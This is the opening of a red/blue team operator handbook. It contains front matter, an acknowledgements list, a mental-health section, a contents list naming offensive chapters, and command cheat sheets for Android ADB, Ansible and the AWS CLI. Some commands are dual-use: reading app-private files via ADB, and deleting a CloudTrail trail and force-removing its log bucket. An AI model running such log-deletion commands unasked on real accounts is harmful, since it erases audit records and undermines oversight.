
OPERATOR HANDBOOK

[Link].L33T;)

RED TEAM + OSINT + BLUE TEAM

NETMUX

V1 [02APR2020]
Operator Handbook. Copyright © 2020 Netmux LLC
All rights reserved. Without limiting the rights under the
copyright reserved above, no part of this publication may be
reproduced, stored in, or introduced into a retrieval system, or
transmitted in any form or by any means (electronic, mechanical,
photocopying, recording, or otherwise) without prior written
permission.

ISBN-10: 9798605493952

Operator Handbook, Operator Handbook Logo, Netmux, and the Netmux
logo are registered trademarks of Netmux, LLC. Other product and
company names mentioned herein may be the trademarks of their
respective owners. Rather than use a trademark symbol with every
occurrence of a trademarked name, we are using the names only in an
editorial fashion and to the benefit of the trademark owner, with
no intention of infringement of the trademark.

The information in this book is distributed on an “As Is” basis,
without warranty. While every precaution has been taken in the
preparation of this work, neither the author nor Netmux LLC shall
have any liability to any person or entity with respect to any loss
or damage caused or alleged to be caused directly or indirectly by
the information contained in it.

While every effort has been made to ensure the accuracy and
legitimacy of the references, referrals, and links (collectively
“Links”) presented in this book/ebook, Netmux is not responsible or
liable for broken Links or missing or fallacious information at the
Links. Any Links in this book to a specific product, process,
website, or service do not constitute or imply an endorsement by
Netmux of same, or its producer or provider. The views and opinions
contained at any Links do not necessarily express or reflect those
of Netmux.

INFOSEC TWITTER ACKNOWLEDGEMENT
@ABJtech @Mandiant @bmenell @m33x
@ACKFlags @ManuscriptMaps @bmenrigh @m3g9tr0n
@AGoldmund @Mao_Ware @bostongolang @m8urnett
@ASTRON_NL @MariNomadie @brandonkovacs @macadminsconf
@ATI_UT @MicahZenko @brandybblevins @macinteractive
@Adam_Cyber @Microsoft @brave @macvfx
@AgariInc @MidAtlanticCCDC @breenmachine @malcomvetter
@AlecMuffett @MikeConvertino @briankrebs @malwrhunterteam
@AndreGironda @Mordor_Project @bromium @mandiant
@AndrewAskins @Morpheus______ @brutelogic @maradydd
@AngelList @MrDanPerez @brysonbort @marcusjcarey
@Anomali @MyABJ @bsdbandit @markarenaau
@Antid0tecom @NASA @bsideslv @mason_rathe
@AricToler @NOBBD @bugcrowd @matthew_d_green
@Arkbird_SOLG @NSAGov @builtbykrit @mattokeefe
@Arkc0n @NYU_CSE @byharryconnolly @maxplanckpress
@ArmyCyberInst @NathanPatin @byt3bl33d3r @mayraatx
@Ascii211 @NetSPI @c0ncealed @mdholcomb
@Atredis @NewAmCyber @c2_matrix @mediafishy
@BEERISAC @NewAmerica @cBekrar @mewo2
@BHinfoSecurity @Newsy @calibreobscura2 @mgoetzman
@BSidesAVL @NoVAHackers @cantcomputer @michaelccronin
@BSidesCHS @Nordic_Choice @carnal0wnage @mikeymikey
@BSidesCharm @NotMedic @caseyjohnellis @moonbas3
@BSidesGVL @caseyjohnston @motosolutions
@BSidesLV @NullMode_ @catcallsPHL @moxie
@BSidesSF @OPCDE @cedowens @mrogers315
@BSidesSac @OSINTCurious @cgbassa @mroytman
@BSides_NoVA @OSPASafeEscape @chain @msftsecurity
@BanyonLabs @OSSEM_Project @checkmydump @msuiche
@Baybe_Doll @OWASP @chkbal @mtones9
@Beaker @Obs_IL @chris_foulon @mubix
@Bellingcat @ObscurityLabs @chrissanders88 @myhackerhouse
@Ben0xA @OpenAI @christruncer @mysmartlogon
@BenDoBrown @Openwall @cktricky @mythicmaps
@BerkeleyLaw @OrinKerr @climagic @neksec
@Binary_Defense @P4wnP1 @cnoanalysis @nerd_nrw
@BlueDoorSector7 @PJVogt @coalfirelabs @netflix
@BlueTeamCon @PMStudioUK @coalfiresys @networkdefense
@BrentWistrom @PWTooStrong @cobalt_io @nickstadb
@BruteLogic @Paladin3161 @codegrazer @nijagaw
@BsidesCLT @PaloAltoNtwks @commandlinefu @nisos
@BsidesDC @PassiveTotal @corelight_inc @nnwakelam
@BsidesLV @PasswordStorage @curi0usJack @nola_con
@BsidesTLV_CTF @PeterWood_PDW @cyb3rops @nostarch
@Bugcrowd @PhishingAi @cyber__sloth @nova_labs
@BugcrowdSupport @PhreakerLife @cyberstatecraft
@Burp_Suite @PiRanhaLysis @cyberwar_15 @nsagov
@CADinc @Prevailion @d3ad0ne_ @nuartvision
@CIA @PrimeVideo @dadamitis @nudelsinpita
@CNMF_VirusAlert @ProductHunt @dafengcao @nytimes
@CONFidenceConf @PwdRsch @daleapearson @objective_see
@CTFtime @PyroTek3 @dangoodin001 @obsecurus
@CU_ICAR @QW5kcmV3 @datadog @offsectraining
@CalibreObscura @RPISEC @daveaitel @oktopuses
@Capsule8 @Rapid7 @davidstewartNY @olafhartong
@CarloAlcan @RealDonaldTrump @davywtf @oleavr
@Carlos_Perez @RecordedFuture @dc_bhv @packetninjas
@CaseyCammilleri @RedDrip7 @dcstickerswap @pagedout_zine
@CashApp @Remediant @deadpixelsec @paloaltontwks
@CaveatCW @RidT @defcon @passingthehash
@Chick3nman512 @RiskIQ @demonslay335 @patricknorton
@CindyOtis_ @Rmy @dex_eve @patrickwardle
@CipherEveryword @Rmy_Reserve @dguido @pedramamini
@CircleCityCon @RonJonArod @dhdenny @pentest_swissky
@ClaireTills @RoseSecOps @dianainitiative @perribus

@ComaeIo @RupprechtDeino @digininja @philofishal
@CptJesus @Rupprecht_A @digitalshadows @philsmd
@CrackMeIfYouCan @RuraPenthe0 @dinodaizovi @photon_research
@CrowdStrike @RuralTechFund @disclosedh1 @pickie_piggie
@SAINTCON @dissect0r @pietdaniel
@Cyb3rWard0g @SAINTCONPCrack @dkorunic @pinguino
@CyberScoopNews @SANSinstitute @donttrythis @pir34
@Cyberarms @SINON_REBORN @dotMudge @planetlabs
@CyberjutsuGirls @SNGengineer @polrbearproject
@CynoPrime @SWiefling @dropdeadfu @prevailion
@DARPA @SailorSnubs @dumpmon @proofpoint
@DCPoliceDept @Salesforce @duo_labs @pumpcon
@D__Gilbertson @SatNOGS @dwizzzleMSFT @pupsuntzu
@Dallas_Hackers @Sbreakintl @dyn___ @pwcrack
@DaniGoland @Sc00bzT @dynllandeilo @quiztime
@DanielMiessler @SecBSD @edskoudis @qwertyoruiopz
@DarkDotFail @efadrones @r_netsec
@DataTribe @SecureThisNow @elastic @rapid7
@Dave_Maynor @SecurityVoices @emailrepio @rchomic
@Defcon @SektionEins @endsurveillance @reaperhulk
@DefuseSec @SethHanford @enigma0x3 @redblobgames
@DeptofDefense @ShapeSecurity @expel_io @redcanaryco
@DharmaPlatform @ShielderSec @eyalsela @reddit
@DhiruKholia @ShiningPonies @fastly @redteamfieldman
@DragonSectorCTF @SiegeTech @felixaime @reed_college_
@Dragonkin37 @SigintOs @foxit @rejoiningthetao
@Dragosinc @SiliconHBO @frankrietta @repdet
@Draplin @SkelSec @fs0c131y @replyall
@Dropbox @Snubs @fun_cuddles @reporturi
@DrunkBinary @SpareTimeUSA @fuzziphy @rickhholland
@DukeU @SpecterOps @g0tmi1k @riettainc
@EarthLib @Spy_Stations @geeknik @rkervell
@Elastic @Square @genscape @rmondello
@ElcomSoft @StartupWatching @gentilkiwi @robot_wombat
@ElectricCoinCo @Status451Blog @githubsecurity @rodoassis
@EmpireHacking @SteveD3 @gm4tr1x @ropnop
@EricMichaud @Stickerum @golem445 @rotmg_news
@ErrataRob @StratSentinel @google @rrcyrus
@Evil_Mog @SummitRoute @grimmcyber @rrhoover
@F5 @SunTzuSec @gynvael @rsi
@F5Networks @SuperfluousSec @hack_secure @rw_access
@FactionC2 @SynackRedTeam @hackerfantastic @ryanaraine
@FalconForceTeam @TCMSecurity @hacks4pancakes @s0lst1c3
@FewAtoms @THE_HELK @s3inlc
@FireEye @TalosSecurity @hak5darren @sS55752750
@Fist0urs @TankerTrackers @halvarflake @sashahacks
@FlatleyAdam @TechDrawl @har1sec @scatsec
@FletcherSchool @TechRanch @harmj0y @scythe_io
@Forensication @Technologeeks @haroonmeer @secbern
@Forrester @TerahashCorp @hashcat @securedrop
@Fortinet @TessSchrodinger @haveibeenpwned @secureideasllc
@FortyNorthSec @Th3Zer0 @hexlax @securitybsides
@Fox_Pick @The4rchangel @heykitzy @securitysublime
@GblEmancipation @TheHackersNews @hshaban @selenawyatt21
@GeorgetownCSS @TheMacFixer @hsmVault @sfissa
@GlytchTech @ThreatConnect @httpseverywhere @sharpstef
@Goetzman @TihanyiNorbert @humuinc @shellphish
@GoogleDevExpert @Timele9527 @i0n1c @shodanhq
@Graphika_Inc @Timo_Steffens @iHeartMalware @slyd0g
@Graphika_NYC @TinkerSec @iTzJeison @snlyngaas
@GreyNoiseIO @TorryCrass @iamthecavalry @snubs
@GrumpyHackers @TrailofBits @ics_village @solardiz
@HP @TribeOfHackers @icsvillage @sonofshirt
@Hacker0x01 @TrimarcSecurity @igsonart @spazef0rze
@HackersHealth @TrustedSec @ihackbanme @specterops
@HackingDave @Twitter @illusivenw @splcenter
@HackingHumansCW @TychoTithonus @iminyourwifi @square
@Hackmiami @USA_Network @initialized @sraveau
@Hak4Kidz @USArmy @insitusec @stevebiddle
@Hak5 @Unallocated @instacyber @stfitzzz

@Harvard @Unit42_Intel @iqlusioninc @stricturegroup
@HashCraftsMen @UnixToolTip @issuemakerslab @stvemillertime
@HashSuite @VCBrags @its_a_feature_ @swagitda_
@Hashcat @VICE @jack_daniel @synack
@HashesOrg @VK_Intel @jaredcatkinson @sysdig
@HashiCorp @VXShare @jaredhaight @tacticalmaid
@Haus3c @VerodinInc @jaysonstreet @tamperinfo
@HenriKenhmann @Viking_Sec @jcanto @taosecurity
@Hexacorn @WashingtonPost @jckichen @taurusgroup_ch
@HoustonHackers @WeekendFund @jedisct1 @tcvieira
@HunterPlaybook @WillStrouseJr @jessysaurusrex @teamcymru
@HuntersForge @WomenCyberjutsu @jhencinski @techstars
@HuntressLabs @WylieNewmark @jimmychappell @teserakt_io
@Hushcon @Xanadrel @jjx @testedcom
@Hydraze @XssPayloads @jkamdjou @th3cyF0x
@ICS_Village @YCND_DC @jmgosney @th_koeln
@IanColdwater @Yuantest3 @jmp_AC @theKos
@IdoNaor1 @ZDNetfr @jmulvenon @theNinjaJobs
@InQuest @ZIMPERIUM @joernchen @theZDI
@InfoSecSherpa @ZecOps @joeynoname @thecybermentor
@Inguardians @Zerodium @john_users @thecyberwire
@InsanityBit @absoluteappsec @jonasl @thegrugq
@Intel471Inc @acedtect @jorgeorchilles @themiraclefound
@IntelCrab @achillean @josephpizzo @thephreck
@J0hnnyXm4s @ackmage @jpgoldberg @thor_scanner
@JAMFSoftware @adamcaudill @jpmosco @thorsheim
@JGamblin @adversariel @jsecurity101 @threatcare
@JSyversen @agariinc @jsoverson @threatstack
@JacquelinesLife @aivillage_dc @jw_sec @tifkin_
@JakeGodin @albinowax @kalgecin @tiraniddo
@James_inthe_box @alexhutton @karimhijazi @tiskimber
@Jhaddix @alexisohanian @kaspersky @tliston
@JohnDCook @aloria @katestarbird @trailofbits
@JohnHultquist @antisnatchor @kauffmanfellows @trbrtc
@Johneitel @armitagehacker @keenjoy95 @troyhunt
@Kaspersky @ashley_shen_920 @kellthenoise @tyler_robinson
@KeePassXC @asmartbear @kennwhite @unix_ninja
@KennaSecurity @atredis @kfalconspb @unix_root
@KismetWireless @atxawesome @kfosaaen @usnavy
@KitPloit @atxstartupweek @khr0x40sh @usscastro
@KryptoAndI @austininno @kirbstr @v33na
@LFC @autumnbreezed @kl_support @veorq
@LOFAR @bad_packets @kledoux @virusbay_io
@LaNMaSteR53 @bascule @knoxss_me @volatility
@LawyerLiz @bcrypt @koelncampus @vshamapant
@LeaKissner @beauwoods @komandsecurity @vxunderground
@Leasfer @bellingcat @krishnasrini @w34kp455
@LeftoftheDialPC @benimmo @kryptera @wammezz
@LibreSpace_Fnd @benjdyer @kudelskisec @wellsgr
@Lisa_O @benmmurphy @kyleehmke @whoismrrobot
@LiveOakVP @bigmacjpg @lady_nerd @winxp5421
@LiveoakVP @billpollock @lakiw @wmespeakers
@Lookout @binaryedgeio @lapcatsoftware @wriveros
@M0nit00r @bitcrack_cyber @letsencrypt @wslafoy
@Ma7ad0r @bittner @likeidreamof28 @xforcered
@MaMe82 @blackorbird @likethecoins @xoreaxeaxeax
@MacDevOpsYVR @blackroomsec @liveoakvp @ydklijnsma
@MacTechConf @blairgillam @lordsaibat @yourstacks
@MaliciaRogue @blkCodeCollctve @lorrietweet @b0mb$h3ll

[Link]
@NETMUX ON TWITTER
OPERATOR HANDBOOK UPDATES OR SEND SUGGESTIONS/CORRECTIONS

HEALTH & WELLNESS
National Suicide Prevention Lifeline: 1-800-273-8255

MENTAL HEALTH HACKERS
[Link]
Twitter @HackersHealth

There’s no simple test that can let someone know if there is a
mental health condition, or if actions and thoughts might be
typical behaviors or the result of a physical illness.

Each condition has its own set of symptoms, but some common signs
of mental health conditions can include the following:
• Excessive worrying or fear
• Feeling excessively sad or low
• Confused thinking or problems concentrating and learning
• Extreme mood changes, including uncontrollable “highs” or
feelings of euphoria
• Prolonged or strong feelings of irritability or anger
• Avoiding friends and social activities
• Difficulties understanding or relating to other people
• Changes in sleeping habits or feeling tired and low energy
• Changes in eating habits such as increased hunger or lack of
appetite
• Changes in sex drive
• Difficulty perceiving reality (delusions/hallucinations)
• Inability to perceive changes in one’s own feelings, behavior, or
personality
• Abuse of substances like alcohol or drugs
• Multiple physical ailments without obvious causes
• Thoughts of suicide, or suicidal planning
• Inability to carry out daily activities or handle daily problems
and stress

Don’t be afraid to reach out if you or someone you know needs help.
Learning all you can about mental health is an important first
step. Reach out to your health insurance, primary care doctor, or
state/country mental health authority for more resources.
I highly recommend finding a Mental Health First Aid class near
you, regardless of whether you are personally struggling with an
issue. Chances are high that you are close to someone who is,
whether you realize it or not. Directly or indirectly, mental
health conditions affect all of us. In fact, one in four people
have some sort of mental health condition. We are not as alone as
we think, and we can make a huge contribution to society just by
staying alive.

Support systems are vital to recovery. The support helps minimize
damage posed by mental illness on an individual. It also can save a
loved one’s life. There are many steps you can take to help
yourself or others, including:
• Inform yourself as much as possible about the illness being
faced.
• Start dialogues, not debates, with family and friends.
• In cases of acute psychiatric distress (experiencing psychosis or
feeling suicidal, for instance), getting to the hospital is the
wisest choice.
• Instead of guessing what helps: Communicate about it, or ask.
• Seek out support groups.
• Reassure your friends or family members that you care about them.
• Offer to help them with everyday tasks if they are unable.
• Include them in your plans and continue to invite them without
being overbearing, even if they resist your invitations.
• Keep yourself well and pace yourself. Overextending yourself will
only cause further problems in the long run.
• Avoid falling into the role of “fixer” and “savior.” No matter
how much you love someone, it cannot save them.
• Offering objectivity, compassion, and acceptance is valuable
beyond measure.
• Know that even if your actions and love may seem to have little
impact, they are making a difference.
• Have realistic expectations. The recovery process is not a
straight line, nor is it one that happens quickly.

PEOPLE TO FOLLOW ON TWITTER FOR LOVE, VIBES, and FEELS DAILY
@bsdbandit
@carnal0wnage
@marcusjcarey
@blenster
@jaysonstreet

INFOSEC TWITTER ACKNOWLEDGEMENT -------------------------------------------- 3
HEALTH & WELLNESS ---------------------------------------------------------------------- 6
A ------------------------------------------------------------------------------------ 12
ANDROID DEBUG BRIDGE (ADB)-------------------------------------------------------13
ANDROID_Resources ---------------------------------------------------------------------16
ANSIBLE --------------------------------------------------------------------------------------16
AWS CLI --------------------------------------------------------------------------------------20
AWS_Defend -------------------------------------------------------------------------------27
AWS_Exploit --------------------------------------------------------------------------------30
AWS_Hardening ---------------------------------------------------------------------------35
AWS_Terms ---------------------------------------------------------------------------------35
AWS_Tricks ---------------------------------------------------------------------------------37
AZURE CLI -----------------------------------------------------------------------------------39
AZURE_Defend-----------------------------------------------------------------------------44
AZURE_Exploit -----------------------------------------------------------------------------44
AZURE_Hardening ------------------------------------------------------------------------48
AZURE_Terms ------------------------------------------------------------------------------48
AZURE_Tricks -------------------------------------------------------------------------------48

B ------------------------------------------------------------------------------------ 49
BLOODHOUND -----------------------------------------------------------------------------49

C ------------------------------------------------------------------------------------ 52
COBALT STRIKE-----------------------------------------------------------------------------52
CYBER CHEF ---------------------------------------------------------------------------------57

D------------------------------------------------------------------------------------ 59
DATABASES ---------------------------------------------------------------------------------59
DEFAULT PASSWORDS -------------------------------------------------------------------60
DOCKER --------------------------------------------------------------------------------------61
DOCKER_Exploit ---------------------------------------------------------------------------63

F ------------------------------------------------------------------------------------ 65
FLAMINGO ----------------------------------------------------------------------------------65
FRIDA -----------------------------------------------------------------------------------------67

G------------------------------------------------------------------------------------ 70
GCP CLI ---------------------------------------------------------------------------------------70
GCP_Defend --------------------------------------------------------------------------------74
GCP_Exploit ---------------------------------------------------------------------------------76
GCP_Hardening ----------------------------------------------------------------------------76
GCP_Terms ---------------------------------------------------------------------------------77
GHIDRA --------------------------------------------------------------------------------------77
GIT --------------------------------------------------------------------------------------------80
GITHUB CLI ----------------------------------------------------------------------------------82

GITHUB_Exploit --------------------------------------------------------------------------- 83
GREYNOISE --------------------------------------------------------------------------------- 84
H ------------------------------------------------------------------------------------ 90
HASHCAT ----------------------------------------------------------------------------------- 91

I ------------------------------------------------------------------------------------- 92
ICS / SCADA TOOLS ---------------------------------------------------------------------- 93
INTERNET EXCHANGE POINTS--------------------------------------------------------- 93
IMPACKET ---------------------------------------------------------------------------------- 93
iOS ------------------------------------------------------------------------------------------- 95
IPTABLES ------------------------------------------------------------------------------------ 97
IPv4 ------------------------------------------------------------------------------------------ 99
IPv6 ----------------------------------------------------------------------------------------- 100
J ----------------------------------------------------------------------------------- 104
JENKINS_Exploit ------------------------------------------------------------------------- 104
JOHN THE RIPPER ----------------------------------------------------------------------- 105
JQ-------------------------------------------------------------------------------------------- 106
K ---------------------------------------------------------------------------------- 108
KUBERNETES------------------------------------------------------------------------------ 108
KUBERNETES_Exploit ------------------------------------------------------------------- 108
KUBECTL ----------------------------------------------------------------------------------- 112
L ----------------------------------------------------------------------------------- 119
LINUX_Commands ---------------------------------------------------------------------- 119
LINUX_Defend --------------------------------------------------------------------------- 123
LINUX_Exploit ---------------------------------------------------------------------------- 127
LINUX_Hardening ----------------------------------------------------------------------- 133
LINUX_Ports ------------------------------------------------------------------------------ 134
LINUX_Structure ------------------------------------------------------------------------- 144
LINUX_Tricks ----------------------------------------------------------------------------- 148
LINUX_Versions -------------------------------------------------------------------------- 150
M --------------------------------------------------------------------------------- 155
MACOS_Commands -------------------------------------------------------------------- 155
MACOS_Defend ------------------------------------------------------------------------- 163
MACOS_Exploit -------------------------------------------------------------------------- 174
MACOS_Hardening --------------------------------------------------------------------- 182
MACOS_Ports ---------------------------------------------------------------------------- 182
MACOS_Structure ----------------------------------------------------------------------- 187
MACOS_Tricks---------------------------------------------------------------------------- 190
MACOS_Versions ------------------------------------------------------------------------ 193
MALWARE_Resources ----------------------------------------------------------------- 194
MDXFIND / MDXSPLIT ------------------------------------------------------------------ 196

METASPLOIT ------------------------------------------------------------------------------ 199
MIMIKATZ --------------------------------------------------------------------------------- 202
MIMIKATZ_Defend---------------------------------------------------------------------- 207
MSFVENOM ------------------------------------------------------------------------------ 208

N ---------------------------------------------------------------------------------- 210
NETCAT ------------------------------------------------------------------------------------ 210
NETWORK DEVICE_Commands ------------------------------------------------------ 211
NFTABLES --------------------------------------------------------------------------------- 217
NMAP -------------------------------------------------------------------------------------- 223
O ---------------------------------------------------------------------------------- 224
OSINT_Techniques ---------------------------------------------------------------------- 225
OSINT_Tools ------------------------------------------------------------------------------ 229
OSINT_Resources ----------------------------------------------------------------------- 234
OSINT_SearchEngines ------------------------------------------------------------------ 235
OSINT_SocialMedia --------------------------------------------------------------------- 238
OSQUERY ---------------------------------------------------------------------------------- 241

P ----------------------------------------------------------------------------------- 243
PACKAGE MANAGERS ------------------------------------------------------------------ 243
PASSWORD CRACKING_Methodology --------------------------------------------- 245
PHYSICAL ENTRY_Keys ----------------------------------------------------------------- 250
PORTS_Top1000 ------------------------------------------------------------------------- 252
PORTS_ICS/SCADA ---------------------------------------------------------------------- 254
PORTS_Malware C2--------------------------------------------------------------------- 256
PUPPET ------------------------------------------------------------------------------------ 259
PYTHON------------------------------------------------------------------------------------ 261

R ----------------------------------------------------------------------------------- 263
REGEX -------------------------------------------------------------------------------------- 263
RESPONDER------------------------------------------------------------------------------- 267
REVERSE SHELLS ------------------------------------------------------------------------- 269

S ----------------------------------------------------------------------------------- 276
SHODAN ----------------------------------------------------------------------------------- 276
SNORT -------------------------------------------------------------------------------------- 278
SPLUNK ------------------------------------------------------------------------------------ 279
SQLMAP ----------------------------------------------------------------------------------- 286
SSH ------------------------------------------------------------------------------------------ 288
T ----------------------------------------------------------------------------------- 294
TCPDUMP --------------------------------------------------------------------------------- 294
THREAT INTELLIGENCE ----------------------------------------------------------------- 297
TIMEZONES ------------------------------------------------------------------------------- 297
TMUX--------------------------------------------------------------------------------------- 303

TRAINING_Blue Team ------------------------------------------------------------------ 305
TRAINING_OSINT ------------------------------------------------------------------------ 305
TRAINING_Red Team ------------------------------------------------------------------- 306
TSHARK ------------------------------------------------------------------------------------ 306

U ---------------------------------------------------------------------------------- 310
USER AGENTS ---------------------------------------------------------------------------- 310
V ---------------------------------------------------------------------------------- 314
VIM ----------------------------------------------------------------------------------------- 314
VOLATILITY -------------------------------------------------------------------------------- 318
W --------------------------------------------------------------------------------- 320
WEB_Exploit ------------------------------------------------------------------------------ 320
WEBSERVER_Tricks --------------------------------------------------------------------- 327
WINDOWS_Commands ---------------------------------------------------------------- 331
WINDOWS_Defend --------------------------------------------------------------------- 336
WINDOWS_Exploit ---------------------------------------------------------------------- 353
WINDOWS_Hardening ----------------------------------------------------------------- 366
WINDOWS_Ports ------------------------------------------------------------------------ 367
WINDOWS_Registry -------------------------------------------------------------------- 372
WINDOWS_Structure ------------------------------------------------------------------ 415
WINDOWS_Tricks ----------------------------------------------------------------------- 417
WINDOWS_Versions ------------------------------------------------------------------- 418
WINDOWS DEFENDER ATP------------------------------------------------------------ 419
WIRELESS FREQUENCIES--------------------------------------------------------------- 425
WIRELESS_Tools ------------------------------------------------------------------------- 427
WIRESHARK ------------------------------------------------------------------------------- 428

Y ---------------------------------------------------------------------------------- 430
YARA ---------------------------------------------------------------------------------------- 430

A
ANDROID DEBUG BRIDGE (ADB)
RED TEAM REVERSE ENGINEERING MOBILE
Android Debug Bridge (adb) is a versatile command-line tool that
lets you communicate with a device. The adb command facilitates a
variety of device actions, such as installing and debugging apps,
and it provides access to a Unix shell that you can use to run a
variety of commands on a device.

ADB BASICS
lists connected
adb devices devices
restarts adbd with
adb root root permissions
starts the adb
adb start-server server
kills the adb
adb kill-server server
adb reboot reboots the device
list of devices by
adb devices -l product/model
starts the
adb shell background terminal
exits the
exit background terminal
adb help list all commands
redirect command to
adb -s <deviceName> <command> specific device
directs command to
only attached USB
adb -d <command> device
directs command to
only attached
adb -e <command> emulator
PACKAGE INSTALLATION
adb shell install <apk> install app
install app from
adb shell install <path> phone path
install app from
adb shell install -r <path> phone path
adb shell uninstall <name> remove the app
PATHS
/data/data/<package>/databases app databases
/data/data/<package>/shared_prefs/ shared preferences
apk installed by
/data/app user

13
pre-installed APK
/system/app files
/mmt/asec encrypted apps
/mmt/emmc internal SD Card
external/Internal
/mmt/adcard SD Card
/mmt/adcard/external_sd external SD Card
list directory
adb shell ls contents
print size of each
adb shell ls -s file
list subdirectories
adb shell ls -R recursively
FILE OPERATIONS
copy file/dir to
adb push <local> <remote> device
copy file/dir from
adb pull <remote> <local> device
access the private
run-as <package> cat <file> package files
PHONE INFO
adb get-stat–µ print device state
get the serial
adb get-serialno number
adb shell dumpsys iphonesybinfo get the IMEI
list TCP
adb shell netstat connectivity
print current
adb shell pwd working directory
adb shell dumpsys battery battery status
adb shell pm list features list phone features
adb shell service list list all services
adb shell dumpsys activity
<package>/<activity> activity info
print process
adb shell ps status
displays the
current screen
adb shell wm size resolution
dumpsys window windows | grep -E print current app's
'mCurrentFocus|mFocusedApp' opened activity
PACKAGE INFO
adb shell list packages list package names
list package name +
adb shell list packages -r path to apks
list third party
adb shell list packages -3 package names

14
list only system
adb shell list packages -s packages
list package names
adb shell list packages -u + uninstalled
list info on all
adb shell dumpsys package packages apps
list info on one
adb shell dump <name> package
path to the apk
adb shell path <package> file
CONFIGURE SETTINGS
change the level
adb shell dumpsys battery set level <n> from 0 to 100
change the level to
adb shell dumpsys battery set status<n> unknown
adb shell dumpsys battery reset reset the battery
change the status
of USB connection.
adb shell dumpsys battery set usb <n> ON or OFF
sets the resolution
adb shell wm size WxH to WxH
DEVICE RELATED CMDS
reboot device into recovery mode
adb reboot recovery

reboot device into fastboot mode
adb reboot fastboot

capture screenshot
adb shell screencap -p "/path/to/[Link]"

record device screen
adb shell screenrecord "/path/to/record.mp4"

backup settings and apps
adb backup -apk -all -f [Link]

backup settings, apps and shared storage
adb backup -apk -shared -all -f [Link]

backup only non-system apps
adb backup -apk -nosystem -all -f [Link]

restore a previous backup
adb restore [Link]

start activity intent
adb shell am start|startservice|broadcast <INTENT>[<COMPONENT>] -a <ACTION> (e.g. [Link]) -c <CATEGORY> (e.g. [Link])

open URL
adb shell am start -a [Link] -d URL

opens gallery
adb shell am start -t image/* -a [Link]

LOGS
view device log
adb logcat [options] [filter] [filter]

print bug reports
adb bugreport
PERMISSIONS
list permission groups definitions
adb shell pm list permission-groups

list permissions details
adb shell pm list permissions -g -r

ANDROID_Resources
RED/BLUE TEAM ANALYSIS MOBILE

AVC UnDroid - [Link]
Submit Android apps for quick online analysis with AVC UnDroid.

Virustotal (max 128MB) - [Link]
Submit suspicious Android files/apks for analysis.

AppCritique - [Link]
Upload your Android APKs and receive comprehensive free security
assessments.

AMAaaS - [Link]
Free Android Malware Analysis Service. A bare metal service
featuring static and dynamic analysis for Android applications. A
product of MalwarePot.

APKPure - EXTRACTED APK's
[Link]
APKs are nothing more than a zip file containing resources and
assembled Java code. If you were to simply unzip an APK, you would
be left with files such as [Link] and [Link].

REFERENCE:
[Link]
[Link]
[Link]

ANSIBLE
RED/BLUE TEAM MANAGEMENT DEVOPS
Ansible is an open-source IT automation engine which can help you
to automate most of your repetitive tasks in your work life.
Ansible can also improve the consistency, scalability, reliability
and easiness of your IT environment.

VARIABLES
host_vars directory for host variable files
group_vars directory for group variable files

facts collecting the host specific data
register registered variables
vars in playbook
vars_files in playbook
include_vars module
include_tasks: [Link] include a sub task file
TASK CONTROL & LOOPS
with_items then “item” inside action
with_nested for nested loops
with_file
with_fileglob
with_sequence
with_random_choice
when meet a condition
MODULES
copy copy file or content
get_url download file
file manage file/directories
yum manage package
service manage services
firewalld firewall service
lineinfile add a line to dest file
template to template file with variables
debug to debug and display
add_host add host to inventory while play
wait_for use for flow control
apt manage apt-packages
shell execute shell commands on targets
PLAYBOOKS
ansible-playbook <YAML>    run on all hosts defined
ansible-playbook <YAML> -f 10    fork - run 10 hosts in parallel
ansible-playbook <YAML> --verbose    verbose on successful tasks
ansible-playbook <YAML> -C    test run
ansible-playbook <YAML> -C -D    dry run
ansible-playbook <YAML> -l <host>    limit to run on single host
HANDLERS
notify to notify the handler
handlers define handler
TAGS
tags add tags to the tasks
--tags ‘<tag>’ during playbook execution
--skip-tags for skipping those tags
tagged run any tagged tasks
untagged any untagged items

all all items
HANDLING ERRORS
ignore_errors    proceed or not if any error on current task
force_handlers    call handler even if the play failed
failed_when    mark the task as failed if a condition is met
changed_when    set “ok” or “failed” for a task
block    logical grouping of tasks (can use with when)
rescue    to run if block clause fails
always    run whether block succeeds or fails
ROLES
Role Directories
defaults    default value of role variables
files    static files referenced by role tasks
handlers    role’s handlers
meta    role info like Author, Licence, Platform etc
tasks    role’s task definition
templates    jinja2 templates
tests    test inventory and [Link]
vars    role’s variable values
pre_tasks    tasks before role
post_tasks    tasks after role
ANSIBLE GALAXY
ansible-galaxy search ‘install git’ --platform el    search for a role
ansible-galaxy info <role-name>    display role information
ansible-galaxy install <role-name> -p <directory>    install role from galaxy
ansible-galaxy list    list local roles
ansible-galaxy remove <role-name>    remove role
ansible-galaxy init --offline <role-name>    initiate a role directory
DELEGATION
delegate_to: localhost    run the task on localhost instead of inventory item
delegate_facts    assign the gathered facts from the tasks to the delegated host instead of current host
PARALLELISM
forks    number of forks or parallel machines
--forks    when using ansible-playbook
serial    control number of parallel machines
async: 3600    wait 3600 seconds to complete the task
poll: 10    check every 10 seconds if task completed
wait_for    module to wait and check if specific condition met
async_status    module to check an async task status
ANSIBLE VAULT
ansible-vault create newfile    create a new vault file
ansible-vault view newfile    view file which is already ansible vaulted
ansible-vault edit newfile    edit file
ansible-vault view --vault-password-file .secret newfile    provide vault password as file
ansible-vault decrypt newfile    remove encryption or vault
ansible-vault rekey newfile    change vault password
--ask-vault-pass or --vault-password-file <secret-password-file>    ask for vault password for ansible-playbook
TROUBLESHOOTING
log_path    where logs are saved
debug    module for debugging
--syntax-check    syntax checking for playbooks before they run
--step    run playbook step by step
--start-at-task    run a playbook but start at specific task
--check    check mode
--diff    will show the expected changes if you run the playbook, but will not do any changes (kind of dry run)
uri    module for testing url
script    module for running script and return success code
stat    module to check the status of files/dir
assert    check file exist

REFERENCE:
[Link]

AWS CLI
RED/BLUE TEAM RECON/ADMIN CLOUD
The AWS Command Line Interface is a unified tool to manage your AWS
services.

aws [options] <command> <subcommand> [parameters]

Command displays help for available top-level commands:


aws help

Command displays the available EC2 (Amazon EC2) specific commands:


aws ec2 help

Command displays detailed help for EC2 DescribeInstances operation.


aws ec2 describe-instances help

Cloudtrail - Logging and Auditing


List all trails
aws cloudtrail describe-trails

List all S3 buckets


aws s3 ls

Create a new trail


aws cloudtrail create-subscription --name awslog --s3-new-bucket awslog2020

List the names of all trails


aws cloudtrail describe-trails --output text | cut -f 8

Get the status of a trail


aws cloudtrail get-trail-status --name awslog

Delete a trail
aws cloudtrail delete-trail --name awslog

Delete the S3 bucket of a trail


aws s3 rb s3://awslog2020 --force

Add tags to a trail, up to 10 tags allowed
